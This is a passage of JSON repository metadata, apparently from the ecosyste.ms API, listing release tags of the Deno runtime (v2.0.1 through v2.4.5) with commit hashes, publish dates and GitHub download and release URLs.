releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@